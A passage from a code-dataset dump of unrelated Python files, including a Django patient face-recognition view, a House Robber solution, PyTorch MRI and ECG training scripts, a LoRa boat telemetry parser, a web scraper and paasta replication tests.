''.join(random.choices(string.ascii_uppercase + string.digits, k=6)) + '.jpg'\n cv2.imwrite(os.path.join(path, photo_name), img)\n\n return Response({'status': 'success', 'message': 'Face Recognised Successfully', 'data': match})\n else:\n print(\"Match Not Found\")\n return Response({'status': 'fail', 'message': 'Match Not Found'},status=status.HTTP_400_BAD_REQUEST)\n\n except Exception as e:\n logger.exception('Exception {}'.format(e.args))\n return Response({'status': 'fail', 'message': 'Something went wrong. 
Please try again later'},\n status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n\nclass SavePhotoView(generics.GenericAPIView):\n def post(self,request):\n try:\n data = request.data\n logger.info('Request Payload {}'.format(data))\n patient_photo = data.get('patient_photo')\n patient_photo1 = data.get('patient_photo1')\n patient_photo2 = data.get('patient_photo2')\n patient_photo3 = data.get('patient_photo3')\n patient_photo4 = data.get('patient_photo4')\n patient_id = data.get('patient_id')\n if not patient_id:\n return Response({'status': 'fail', 'message': 'Please Choose a Patient'},\n status=status.HTTP_400_BAD_REQUEST)\n\n if not patient_photo or not patient_photo1 or not patient_photo2 or not patient_photo3 or not patient_photo4:\n return Response({'status': 'fail', 'message': 'Please Choose a Patient Photo'},\n status=status.HTTP_400_BAD_REQUEST)\n create_directory = patient_id\n directory = settings.KNOWN_FACE_DIRECTORY\n path = os.path.join(directory, create_directory)\n try:\n os.mkdir(path)\n except OSError as error:\n pass\n # logger.exception('os error {}'.format(error.args))\n # return Response({'status': 'fail', 'message': \"File not Found\"})\n for photo in data.values():\n if patient_id == photo:\n pass\n else:\n pil_img = Image.open(photo)\n np_img = np.array(pil_img)\n img = cv2.cvtColor(np_img, cv2.COLOR_RGB2BGR)\n photo_name = ''.join(random.choices(string.ascii_uppercase + string.digits, k=5)) + '.jpg'\n\n cv2.imwrite(os.path.join(path, photo_name), img)\n\n return Response({'status': 'success', 'message': 'Photo Stored Successfully'})\n\n except Exception as e:\n logger.exception('Exception {}'.format(e.args))\n return Response({'status': 'fail', 'message': 'Something went wrong. Please try again later'},\n status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n","sub_path":"Faceapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"213660226","text":"\"\"\"\nYou are a professional robber planning to rob houses along a street. 
Each house has a certain amount of money stashed, the only constraint stopping you from robbing each of them is that adjacent houses have security system connected and it will automatically contact the police if two adjacent houses were broken into on the same night.\n\nGiven a list of non-negative integers representing the amount of money of each house, determine the maximum amount of money you can rob tonight without alerting the police.\n\nExample 1:\n\nInput: [1,2,3,1]\nOutput: 4\nExplanation: Rob house 1 (money = 1) and then rob house 3 (money = 3).\n Total amount you can rob = 1 + 3 = 4.\nExample 2:\n\nInput: [2,7,9,3,1]\nOutput: 12\nExplanation: Rob house 1 (money = 2), rob house 3 (money = 9) and rob house 5 (money = 1).\n Total amount you can rob = 2 + 9 + 1 = 12.\n\"\"\"\nfrom typing import List\n\nclass Solution:\n def rob(self, nums: List[int]) -> int:\n if nums:\n if len(nums) == 1: return nums[-1]\n optimal = [nums[0], max(nums[0], nums[1])]\n if len(nums) > 2:\n for i, num in enumerate(nums[2::]):\n optimal.append(max(optimal[i+1], optimal[i] + num))\n return optimal[-1]\n return 0\n\n \n","sub_path":"LeetCode/easy/198_House_robber.py","file_name":"198_House_robber.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"10910644","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Mar 27 18:09:50 2021\n\n@author: Ding\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 23 22:50:13 2021\n\n@author: Ding\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 23 17:08:09 2021\n\n@author: Ding\n\"\"\"\n\n\n#main.py\nimport os\nimport time\nimport shutil\nimport argparse\nimport torch\nimport torch.nn as nn\nimport numpy as np\nimport resnet3d\nimport torch.backends.cudnn as cudnn\nfrom sklearn.model_selection import StratifiedKFold\nfrom torch.utils.data.dataset import Dataset\nimport torch.multiprocessing as mp\n#settings\nparser = argparse.ArgumentParser(description='single brain region model')\n\nparser.add_argument('--local_rank', default=-1, type=int,\n help='node rank for distributed training')\nparser.add_argument('--epochs', default=150, type=int, \n help='number of total epochs to run')\nparser.add_argument('--batch_size',default=128, type=int,\n help='batch size of all GPUs')\nparser.add_argument('--lr',default=1e-3,type=float,\n help='initial learning rate')\nparser.add_argument('--momentum', default=0.9, type=float, \n help='momentum')\nparser.add_argument('--weight_decay',\n default=1e-4,\n type=float,\n help='weight decay (default: 1e-4)')\nparser.add_argument('-p', '--print-freq', default=10, type=int, \n help='print frequency (default: 10)')\nparser.add_argument('-e', '--evaluate', dest='evaluate', action='store_true', \n help='evaluate model on validation set')\nparser.add_argument('--pretrained', dest='pretrained', action='store_true', \n help='use pre-trained model')\nparser.add_argument('--seed', default=None, type=int, \n help='seed for initializing training. ')\nparser.add_argument('-a','--arch',default='resnet18',\n help='model name')\n#parser.add_argument('data', default=None, type=float, \n# help='dataset, including train and test set and their labels, which will be segmented by K fold. 
')\n\n\n\ndef reduced_mean(tensor, nprocs):\n rt = tensor.clone()\n torch.distributed.all_reduce(rt, op=torch.distributed.ReduceOp.SUM)\n rt /= nprocs\n return rt\n\ndef gather_tensor(tensor):\n rt=[tensor.clone() for _ in range(torch.distributed.get_world_size()) ]\n torch.distributed.all_gather(rt, tensor)\n concat= torch.cat(rt,dim=0)\n return concat\n\nclass InputDataset(Dataset):\n def __init__(self,inputdata,inputlabel):\n self.Data=inputdata\n self.Label=inputlabel\n \n def __getitem__(self, index):\n data=self.Data[index]\n label=self.Label[index]\n return data, label \n \n def __len__(self):\n return len(self.Data)\n\nclass AGC(nn.Module):\n def __init__(self,in_channel, out_channel,hidden_channel):\n super(AGC,self).__init__()\n \n self.layer1=nn.Sequential(nn.Conv3d(in_channel, hidden_channel, kernel_size=(1,1,1), bias=False),\n nn.BatchNorm3d(hidden_channel),\n nn.ReLU())\n \n self.layer2=nn.Sequential(nn.Conv3d(hidden_channel,out_channel, kernel_size=(1,1,1), bias=False),\n nn.Sigmoid())\n \n def forward(self,x):\n x=self.layer1(x)\n out=self.layer2(x)\n \n return out\n \nclass PC_ResNet(nn.Module):\n def __init__(self,ResNet_Model):\n super(PC_ResNet,self).__init__()\n \n self.block1=nn.Sequential(*list(ResNet_Model.children())[-10:-6])\n self.block2=nn.Sequential(*list(ResNet_Model.children())[-6:-5])\n self.block3=nn.Sequential(*list(ResNet_Model.children())[-5:-4])\n self.block4=nn.Sequential(*list(ResNet_Model.children())[-4:-3])\n self.block5=nn.Sequential(*list(ResNet_Model.children())[-3:-2])\n self.block6=nn.Sequential(\n nn.Linear(6528,2))\n self.Flatten=nn.Flatten()\n def forward(self, x):\n x=self.block1(x)\n x=self.block2(x)\n f1=self.Flatten(x)\n x=self.block3(x)\n f2=self.Flatten(x)\n x=self.block4(x)\n f3=self.Flatten(x)\n x=self.block5(x)\n f4=self.Flatten(x)\n out=torch.cat((f1,f2,f3,f4),dim=1)\n out=self.block6(out)\n return out \n \n \ndef main():\n args = parser.parse_args()\n args.nprocs = torch.cuda.device_count()\n# args.nprocs = 2\n# os.environ['CUDA_VISIBLE_DEVICES']='4,5'\n os.environ['MASTER_ADDR'] ='124.16.75.175'\n os.environ['MASTER_PORT'] = '12345'\n data_path='/home/ding/exp_2/data/Hippocampus_LAD_NC.npy'\n data=np.load(data_path)\n\n\n \n label=np.concatenate((np.ones([200,1],dtype=float),np.zeros([235,1],dtype=float)),0)\n args.label=label\n data=InputDataset(data,label)\n args.data=data\n model=resnet3d.ResNet(resnet3d.BasicBlock, [1, 1, 1, 1],resnet3d.get_inplanes(),\n n_input_channels=1,\n conv1_t_size=27,\n conv1_t_size2=27,\n conv1_t_size3=20,\n conv1_t_stride=1,\n no_max_pool=False,\n shortcut_type='B',\n n_classes=2)\n \n total_model=PC_ResNet(model)\n mp.spawn(main_worker, nprocs=args.nprocs, args=(args.nprocs, args, total_model))\n \n\ndef main_worker(local_rank,nprocs, args, model):\n args.local_rank = local_rank\n torch.distributed.init_process_group(backend='nccl', world_size=args.nprocs, rank=local_rank)\n torch.cuda.set_device(local_rank)\n cudnn.benchmark = True\n args.batch_size = int(args.batch_size / args.nprocs) \n \n kf = StratifiedKFold(n_splits=5,shuffle=True,random_state=2021)\n original_params=model.state_dict()\n n_split=0\n result_mat=np.zeros([5,7])\n for train_idx, test_idx in kf.split(args.data.Data,args.label):\n \n model.load_state_dict(original_params)\n \n model.cuda(local_rank)\n model_para = torch.nn.parallel.DistributedDataParallel(model, device_ids=[local_rank])\n best_acc1= .0\n\n\n \n criterion = nn.CrossEntropyLoss().cuda(local_rank)\n optimizer = torch.optim.SGD(model_para.parameters(), args.lr, 
momentum=args.momentum, weight_decay=args.weight_decay)\n\n \n train_data=args.data.Data[train_idx]\n train_label=args.data.Label[train_idx]\n train_data=np.array(train_data)\n train_label=np.array(train_label)\n train_data=torch.from_numpy(train_data)\n train_label=torch.from_numpy(train_label)\n \n \n test_data=args.data.Data[test_idx]\n test_label=args.data.Label[test_idx]\n test_data=np.array(test_data)\n test_label=np.array(test_label)\n test_data=torch.from_numpy(test_data)\n test_label=torch.from_numpy(test_label)\n \n train_dataset = torch.utils.data.TensorDataset(train_data,train_label)\n train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset)\n \n train_loader = torch.utils.data.DataLoader(train_dataset,\n batch_size=args.batch_size,\n num_workers=2,\n pin_memory=True,\n sampler=train_sampler)\n \n \n test_dataset = torch.utils.data.TensorDataset(test_data,test_label)\n test_sampler = torch.utils.data.distributed.DistributedSampler(test_dataset)\n test_loader = torch.utils.data.DataLoader(test_dataset,\n batch_size=args.batch_size,\n num_workers=2,\n pin_memory=True,\n sampler=test_sampler)\n \n \n if args.evaluate:\n validate(test_loader, model_para, criterion, local_rank, args)\n return\n \n for epoch in range(args.epochs):\n \n train_sampler.set_epoch(epoch)\n test_sampler.set_epoch(epoch)\n \n adjust_learning_rate(optimizer, epoch, args)\n \n train(train_loader, model_para, criterion, optimizer, epoch, local_rank, args)\n \n acc1 = validate(test_loader, model_para, criterion, local_rank, args)\n \n is_best = acc1.Accuracy > best_acc1\n best_acc1 = max(acc1.Accuracy, best_acc1)\n\n if args.local_rank == 0:\n save_checkpoint(\n {\n 'epoch': epoch + 1,\n 'arch': args.arch,\n 'state_dict': model_para.module.state_dict(),\n 'best_acc1': best_acc1,\n }, is_best)\n \n result_path='/home/ding/exp_2/result/result_Hippocampus_L_PC_ResNet_'+str(n_split)+'time.npy'\n result_mat[n_split,0]=acc1.Accuracy\n result_mat[n_split,1]=acc1.TPR\n result_mat[n_split,2]=acc1.FPR\n result_mat[n_split,3]=acc1.Precision\n result_mat[n_split,4]=acc1.F1score\n result_mat[n_split,5]=acc1.Kappa\n n_split=n_split+1\n np.save(result_path,result_mat)\n \ndef train(train_loader, model, criterion, optimizer, epoch, local_rank, args):\n model.train()\n batch_time = AverageMeter('Time', ':6.3f')\n losses = AverageMeter('Loss', ':.4e')\n Accuracy=AverageMeter('Accuracy', ':6.3f')\n progress = ProgressMeter(len(train_loader), [batch_time, losses, Accuracy],\n prefix=\"Epoch: [{}]\".format(epoch))\n end=time.time()\n for i,(data,label) in enumerate(train_loader):\n# print(i)\n data=data.unsqueeze(dim=1)\n label=label.squeeze()\n data = data.type(torch.FloatTensor)\n label = label.type(torch.LongTensor)\n data=data.cuda(local_rank,non_blocking=True)\n label=label.cuda(local_rank,non_blocking=True)\n \n \n \n output=model(data)\n \n loss = criterion(output, label)\n \n torch.distributed.barrier()\n \n total_output=gather_tensor(output)\n total_label=gather_tensor(label)\n \n result=accuracy(total_output,total_label)\n Accuracy.update(result.Accuracy)\n reduced_loss = reduced_mean(loss, args.nprocs)\n \n losses.update(reduced_loss.item(), data.size(0))\n \n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n \n batch_time.update(time.time() - end)\n end = time.time()\n\n if i % args.print_freq == 0:\n\n progress.display(i)\n\n\ndef validate(test_loader, model, criterion, local_rank, args):\n \n model.eval()\n batch_time = AverageMeter('Time', ':6.3f')\n losses = AverageMeter('Loss', 
':.4e')\n    Accuracy= AverageMeter('Accuracy', ':6.3f')\n    progress = ProgressMeter(len(test_loader), [batch_time, losses, Accuracy ], prefix='Test: ')\n\n    with torch.no_grad():\n        end = time.time()\n        for i, (data, label) in enumerate(test_loader):\n            data=data.unsqueeze(dim=1)\n            label=label.squeeze()\n            data = data.type(torch.FloatTensor)\n            label = label.type(torch.LongTensor)\n            data=data.cuda(local_rank,non_blocking=True)\n            label=label.cuda(local_rank,non_blocking=True)\n\n            # compute output\n            output = model(data)\n            loss = criterion(output, label)\n\n            torch.distributed.barrier()\n\n            total_output=gather_tensor(output)\n            total_label=gather_tensor(label)\n\n            result=accuracy(total_output,total_label)\n            reduced_loss = reduced_mean(loss, args.nprocs)\n\n            losses.update(reduced_loss.item(), data.size(0))\n\n            batch_time.update(time.time() - end)\n\n            Accuracy.update(result.Accuracy)\n            end = time.time()\n\n            if i % args.print_freq == 0:\n                progress.display(i)\n\n    return result\n\ndef save_checkpoint(state, is_best, filename='checkpoint.pth.tar'):\n    torch.save(state, filename)\n    if is_best:\n        shutil.copyfile(filename, 'model_best.pth.tar')\n\n\nclass AverageMeter(object):\n    \"\"\"Computes and stores the average and current value\"\"\"\n    def __init__(self, name, fmt=':f'):\n        self.name = name\n        self.fmt = fmt\n        self.reset()\n\n    def reset(self):\n        self.val = 0\n        self.avg = 0\n        self.sum = 0\n        self.count = 0\n\n    def update(self, val, n=1):\n        self.val = val\n        self.sum += val * n\n        self.count += n\n        self.avg = self.sum / self.count\n\n    def __str__(self):\n        fmtstr = '{name} {val' + self.fmt + '} ({avg' + self.fmt + '})'\n        return fmtstr.format(**self.__dict__)\n\n\nclass ProgressMeter(object):\n    def __init__(self, num_batches, meters, prefix=\"\"):\n        self.batch_fmtstr = self._get_batch_fmtstr(num_batches)\n        self.meters = meters\n        self.prefix = prefix\n\n    def display(self, batch):\n        entries = [self.prefix + self.batch_fmtstr.format(batch)]\n        entries += [str(meter) for meter in self.meters]\n        print('\\t'.join(entries))\n\n    def _get_batch_fmtstr(self, num_batches):\n        num_digits = len(str(num_batches // 1))\n        fmt = '{:' + str(num_digits) + 'd}'\n        return '[' + fmt + '/' + fmt.format(num_batches) + ']'\n\nclass Result(object):\n    def __init__(self, Accuracy,TPR,FPR,Precision,Kappa,F1score):\n        self.Accuracy=Accuracy\n        self.TPR=TPR\n        self.FPR=FPR\n        self.Precision=Precision\n        self.Kappa=Kappa\n        self.F1score=F1score\n\ndef adjust_learning_rate(optimizer, epoch, args):\n    \"\"\"Sets the learning rate to the initial LR decayed by 10 every 30 epochs\"\"\"\n    lr = args.lr * (0.1**(epoch // 30))\n    for param_group in optimizer.param_groups:\n        param_group['lr'] = lr\n\ndef accuracy(output,label):\n    with torch.no_grad():\n\n        TP=0\n        TN=0\n        FP=0\n        FN=0\n        n_sample=output.shape[0]\n\n        for i in range(n_sample):\n\n            if (output[i,0] < output[i,1]) and (label[i]==1):\n                TP=TP+1\n            if (output[i,0] > output[i,1]) and (label[i]==0):\n                TN=TN+1\n            if (output[i,0] < output[i,1]) and (label[i]==0):\n                FP=FP+1\n            if (output[i,0] > output[i,1]) and (label[i]==1):\n                FN=FN+1\n\n        Accuracy = -1\n        TPR=-1\n        FPR=-1\n        Precision=-1\n        Recall=-1\n        F1score=-1\n        Pe=-1\n        Kappa=-1\n\n        if TP+TN+FP+FN !=0:\n            Accuracy=(TP+TN) / (TP+TN+FP+FN)\n        if TP+FN !=0:\n            TPR=TP/(TP+FN)\n        if FP+TN != 0:\n            FPR=FP/(FP+TN)\n        if TP+FP != 0:\n            Precision=TP/(TP+FP)\n        if TP+FN != 0:\n            Recall=TP/(TP+FN)\n        if Precision+Recall != 0:\n            F1score=(2*Precision*Recall)/(Precision+Recall)\n        if TP+TN+FP+FN != 0:\n            Pe=(TN+TP)/((TP+TN+FP+FN)**2)\n        if 1-Pe !=0:\n            Kappa=(Accuracy-Pe)/(1-Pe)\n\n        result=Result(Accuracy=Accuracy,TPR=TPR,FPR=FPR,Precision=Precision, Kappa=Kappa,F1score=F1score)\n
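\n        # Note: the Pe above is a simplified chance-agreement term; the textbook Cohen's kappa\n        # would use Pe = ((TP+FN)*(TP+FP) + (FP+TN)*(FN+TN)) / (TP+TN+FP+FN)**2.\n\n    return 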
result\n\nif __name__ == '__main__':\n    main()","sub_path":"main_PCR.py","file_name":"main_PCR.py","file_ext":"py","file_size_in_byte":15586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}{"seq_id":"452595280","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2017/8/28 10:10\n# @Author : Aries\n# @Site : \n# @File : 进程池.py\n# @Software: PyCharm\nfrom multiprocessing import Pool\nimport os,time\ndef task(n):\n    print(\"<%s> is running\"%os.getpid())\n    time.sleep(2)\n    print(\"<%s> is done\"%os.getpid())\n    return n**2\nif __name__ == '__main__':\n    p=Pool(4)\n    for i in range(1,7):\n        res=p.apply(task,args=(i,))\n        print(\"Result of this task: %s\"%res)\n    print(\"main process\")\n\nprint(\"Number of CPUs: %s\"%os.cpu_count())","sub_path":"python/多线程/共享内存案例/进程池.py","file_name":"进程池.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}{"seq_id":"305673267","text":"import asyncio\n\nimport aiopubsub\n\nfrom boatgod.hub import lora_publisher\nfrom boatgod.nmea2000 import create_rmp_message, create_voltage_message\n\n\nclass LoraProtocol(asyncio.Protocol):\n    VOLTAGE_MULTIPLIER = 1.7636363636363637 / 100\n    RPM_CALIBRATION = 1\n\n    def __init__(self):\n        self.result = []\n        self.inverse = 0x00\n        self.state = 0\n        self.point = 0\n        self.len = 0\n        self.crc = 0\n        self.transport = None\n\n    def connection_made(self, transport):\n        self.transport = transport\n        print('port opened', transport)\n\n    def data_received(self, pck):\n        for a in pck:\n            if a == 0xAA:\n                self.result = []\n                self.state = 1\n                self.point = 0\n                self.len = 0\n                self.inverse = 0x00\n                self.crc = 0\n                continue\n            if a == 0xBB:\n                self.inverse = 0xFF\n                continue\n            if self.state == 0:\n                continue\n            b = a ^ self.inverse\n            self.inverse = 0\n            if self.point == 0:\n                self.len = b\n\n            if self.point > self.len:\n                if b != (self.crc & 255):\n                    self.state = 0\n                    continue\n                self.on_message(self.result[1:])\n            self.crc += b\n            self.result.append(b)\n            self.point += 1\n\n    def connection_lost(self, exc):\n        pass\n\n
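    # Framing, as inferred from data_received above: 0xAA starts a frame, 0xBB escapes the next\n    # byte (which is XOR-ed with 0xFF), the first decoded byte is the payload length, and the\n    # trailing byte is an additive checksum (low 8 bits of the running sum). Within the payload,\n    # msg[3] selects the message type handled below.\n    def on_message(self, msg):\n\n        cmd = msg[3]\n        if cmd == 0x02: # voltage and RPM\n            v = int.from_bytes(msg[6:8], \"little\") * LoraProtocol.VOLTAGE_MULTIPLIER\n            rpm = int.from_bytes(msg[4:6], \"little\") * 60 * LoraProtocol.RPM_CALIBRATION\n            lora_publisher.publish(aiopubsub.Key('obj', 'voltage'), v)\n            lora_publisher.publish(aiopubsub.Key('obj', 'rpm'), rpm)\n\n            lora_publisher.publish(aiopubsub.Key('message', 'nmea2000'),\n                                   create_rmp_message(rpm))\n\n            lora_publisher.publish(aiopubsub.Key('message', 'nmea2000'),\n                                   create_voltage_message(v))\n\n        if cmd == 0x03: # reed switch, water leak, battery voltage\n            lora_publisher.publish(aiopubsub.Key('obj', 'flood'),\n                                   dict(water=msg[4],\n                                        door=msg[5],\n                                        battery=msg[6],\n                                        ))\n","sub_path":"boatgod/lora.py","file_name":"lora.py","file_ext":"py","file_size_in_byte":2546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}{"seq_id":"431745556","text":"#!/usr/bin/env python\n\n'''\nWeb scraper for the edgar company listings site. Parses company information\nfrom HTML to a list that contains a JSON list of company json objects.\n\nSearches through a list of pages and parses company links on the page from the\ngiven company listings. 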
Parses information from each company information page\nand creates a JSON object for each company, which is stored in a list and\nwritten to a specified file.\n\nAuthor: Alexander Roth\nDate: 2016-03-26\n'''\n\nfrom bs4 import BeautifulSoup\nimport json\nimport requests\nimport sys\n\nBASE_EDGAR_URL = 'http://data-interview.enigmalabs.org'\nEDGAR_URL = 'http://data-interview.enigmalabs.org/companies/'\n\n\ndef main():\n    page = get_webpage(EDGAR_URL)\n\n    json_list = []\n    next_link = get_next_link(page)\n\n    # When the scraper reaches the final page in the sequence of pages, the\n    # next anchor links to an octothorpe.\n    while next_link != '#':\n        json_list.extend(collect_entries_on_page(page))\n        next_link = get_next_link(page)\n        page = get_webpage(BASE_EDGAR_URL + next_link)\n\n    write_list_to_file(json_list, 'solution.json')\n\n\ndef get_webpage(url):\n    '''\n    Returns a BeautifulSoup object of the HTML document specified by the given\n    URL.\n\n    Arguments:\n    url -- A path to a specified HTML document\n    '''\n    assert type(url) is str\n\n    result = requests.get(url)\n    page = BeautifulSoup(result.text, 'html.parser')\n\n    return page\n\n\ndef get_next_link(page):\n    '''\n    Returns a link to the next company list page in the sequence of list pages\n\n    Arguments:\n    page -- The list page currently being examined\n    '''\n    assert page\n\n    return page.ul.find(attrs={'class': 'next'}).contents[0].get('href')\n\n\ndef collect_entries_on_page(page):\n    '''\n    Returns a list of dictionaries that contain information for all companies\n    located within the company table for a given page.\n\n    Since each page lists companies and maintains links to these companies'\n    information pages, we locate all the anchors within the company table and\n    examine each of these links for company information to scrape. Once we\n    generate the json object, we append it to the json list.\n\n    Arguments:\n    page -- The current page containing the table of companies\n    '''\n    assert page\n\n    json_list = []\n\n    for link in page.tbody.find_all('a'):\n        company_link = BASE_EDGAR_URL + link.get('href')\n        company_page = get_webpage(company_link)\n        company_json = scrape_company_page(company_page)\n        json_list.append(company_json)\n\n    return json_list\n\n\ndef scrape_company_page(page):\n    '''\n    Returns a Python dictionary that contains information related to a company\n    from the company's information page.\n\n    Since all the information for the company is maintained in a well-formatted\n    table, we take the id of the row as the key and the text of the row as the\n    value for the key-value pair for that company in a dictionary.\n\n    Arguments:\n    page -- The company page being parsed\n    '''\n    assert page\n\n    return {row.get('id'): row.text for row in page.find_all(has_id)}\n\n\ndef has_id(tag):\n    '''\n    Returns true if the specified tag object has an ID.\n\n    Arguments:\n    tag -- The tag object being examined\n    '''\n    return tag.has_attr('id')\n\n\ndef write_list_to_file(json_list, filename):\n    '''\n    Writes the specified json list out to the specified json file.\n\n    Arguments:\n    json_list -- A list of json-like objects\n    filename -- The path to the specified json file\n    '''\n    assert json_list\n    assert type(json_list) is list\n    assert type(filename) is str\n\n    with open(filename, 'w') as json_file:\n        json.dump(json_list, json_file, indent=2)\n
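\n\n# Example with hypothetical data:\n#   write_list_to_file([{'company-name': 'Acme Corp'}], 'out.json')\n# writes a two-space-indented JSON array to out.json.\n\n\ndef print_arguments(arg):\n    ''' Prints arguments of script to standard output. 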
'''\n    print('python {}'.format(arg))\n    sys.exit(1)\n\n\nif __name__ == '__main__':\n    if len(sys.argv) == 1:\n        main()\n    else:\n        print_arguments(sys.argv[0])\n","sub_path":"enigma/web_scraper.py","file_name":"web_scraper.py","file_ext":"py","file_size_in_byte":4001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}{"seq_id":"575980452","text":"import os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\nimport gc\n\nimport numpy as np\nimport pandas as pd\nimport scipy.io as sio\nimport matplotlib.pyplot as plt\n# import seaborn as sns\n\nfrom models.Conv1d import *\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping\nfrom keras import backend as K\nfrom sklearn.metrics import confusion_matrix, accuracy_score\nfrom sklearn.model_selection import StratifiedKFold\n\nfrom utils_ml import *\nfrom utils_data import *\n\n\ndef train_and_evaluate(model, X_train, Y_train, X_test, Y_test, model_name):\n\n    model_path = \"./trained_models/{}/\".format(model_name)\n\n    if not os.path.exists(model_path):\n        os.makedirs(model_path)\n\n    checkpointer = ModelCheckpoint(filepath='{}/best_model.h5'.format(model_path),\n                                   monitor='val_acc',\n                                   verbose=1,\n                                   save_best_only=True)\n\n    # early_stopping = EarlyStopping(monitor='val_acc', min_delta=0, patience=50, verbose=1, mode='auto')\n\n    # print(\"x shape\", X_train.shape)\n    # print(\"y shape\", Y_train.shape)\n\n    hist = model.fit(X_train, Y_train,\n                     validation_data=(X_test, Y_test),\n                     batch_size=275,\n                     epochs=3,\n                     verbose=2,\n                     shuffle=True,\n                     callbacks=[checkpointer])\n\n    # save history\n    pd.DataFrame(hist.history).to_csv('{}/history.csv'.format(model_path))\n\n    pd.DataFrame(hist.history['acc']).to_csv('{}/train_acc.csv'.format(model_path))\n    pd.DataFrame(hist.history['loss']).to_csv('{}/loss.csv'.format(model_path))\n    pd.DataFrame(hist.history['val_acc']).to_csv('{}/val_acc.csv'.format(model_path))\n    pd.DataFrame(hist.history['val_loss']).to_csv('{}/val_loss.csv'.format(model_path))\n\n    # evaluation\n    predictions = model.predict(X_test)\n\n    score = accuracy_score(onehots2numbers(Y_test), predictions.argmax(axis=1))\n    print('Last epoch\\'s validation score is ', score)\n\n    df = pd.DataFrame(predictions.argmax(axis=1))\n    df.to_csv('{}/preds_{:.4f}.csv'.format(model_path, score), index=None, header=None)\n\n    cm = confusion_matrix(onehots2numbers(Y_test), predictions.argmax(axis=1))\n    df = pd.DataFrame(cm)\n    df.to_csv('{}/confusion_matrix_{:.4f}.csv'.format(model_path, score), index=None, header=None)\n\n    del model\n    K.clear_session()\n    gc.collect()\n\n    return score\n\n\ndef cross_validation(model, X, Y, n_fold=10):\n    skf = StratifiedKFold(n_splits=n_fold, shuffle=True)\n    y = Y.reshape(X.shape[0],)\n\n    scores = []\n    for i, (train_index, val_index) in enumerate(skf.split(X, y)):\n        X_train = X[train_index, :]\n        Y_train = Y[train_index, :]\n        X_val = X[val_index, :]\n        Y_val = Y[val_index, :]\n        score = train_and_evaluate(model, X_train, Y_train, X_val, Y_val, i)\n        scores.append(score)\n\n    return scores\n\n\n# project parameters\nDATA_PATH = 'data/training2017/'\nLABELS_PATH = DATA_PATH + 'REFERENCE.csv'\n\n# lower bound of the length of the signal\nLB_LEN_MAT = 100\n\n# upper bound of the length of the signal\nUB_LEN_MAT = 10100\n\nLABELS = [\"N\", \"A\", \"O\"]\nn_classes = len(LABELS) + 1\n\nnp.random.seed(7)\n\nif __name__ == \"__main__\":\n\n    # this helps a lot when debugging\n    print(os.getcwd())\n\n    X, Y = load_cinc_data(DATA_PATH, LB_LEN_MAT, LABELS)\n\n    # data preprocessing\n    X = duplicate_padding(X, UB_LEN_MAT)\n
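    # Note: this standardizes with statistics pooled over the full dataset (train and test together);\n    # a leakage-free variant would compute the mean/std on the training split only.\n    X = (X - X.mean()) / 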
(X.std())\n X = np.expand_dims(X, axis=2)\n\n # shuffle the data\n values = [i for i in range(len(X))]\n permutations = np.random.permutation(values)\n X = X[permutations, :]\n Y = Y[permutations, :]\n\n # train test split\n train_test_ratio = 0.9\n n_sample = X.shape[0]\n\n X_train = X[:int(train_test_ratio * n_sample), :]\n Y_train = Y[:int(train_test_ratio * n_sample), :]\n X_test = X[int(train_test_ratio * n_sample):, :]\n Y_test = Y[int(train_test_ratio * n_sample):, :]\n \n # load the model and train it\n model = conv1d(UB_LEN_MAT)\n\n cross_validation(model, X, Y)\n # train_and_evaluate(model, X_train, Y_train, X_test, Y_test, \"conv_model\")\n\n","sub_path":"cross_validation.py","file_name":"cross_validation.py","file_ext":"py","file_size_in_byte":4118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"344619145","text":"# Copyright 2015-2016 Yelp Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nfrom datetime import datetime\nfrom datetime import timedelta\nfrom datetime import timezone\n\nimport mock\nimport pytest\n\nfrom paasta_tools import check_marathon_services_replication\nfrom paasta_tools.utils import compose_job_id\n\ncheck_marathon_services_replication.log = mock.Mock()\n\n\n@pytest.fixture\ndef instance_config():\n service = \"fake_service\"\n instance = \"fake_instance\"\n job_id = compose_job_id(service, instance)\n mock_instance_config = mock.Mock(\n service=service,\n instance=instance,\n cluster=\"fake_cluster\",\n soa_dir=\"fake_soa_dir\",\n job_id=job_id,\n )\n mock_instance_config.get_replication_crit_percentage.return_value = 90\n mock_instance_config.get_registrations.return_value = [job_id]\n return mock_instance_config\n\n\ndef test_check_service_replication_for_normal_smartstack(instance_config):\n instance_config.get_instances.return_value = 100\n all_tasks = []\n with mock.patch(\n \"paasta_tools.check_marathon_services_replication.get_proxy_port_for_instance\",\n autospec=True,\n return_value=666,\n ), mock.patch(\n \"paasta_tools.monitoring_tools.check_replication_for_instance\", autospec=True,\n ) as mock_check_replication_for_service:\n check_marathon_services_replication.check_service_replication(\n instance_config=instance_config,\n all_tasks_or_pods=all_tasks,\n replication_checker=None,\n )\n mock_check_replication_for_service.assert_called_once_with(\n instance_config=instance_config,\n expected_count=100,\n 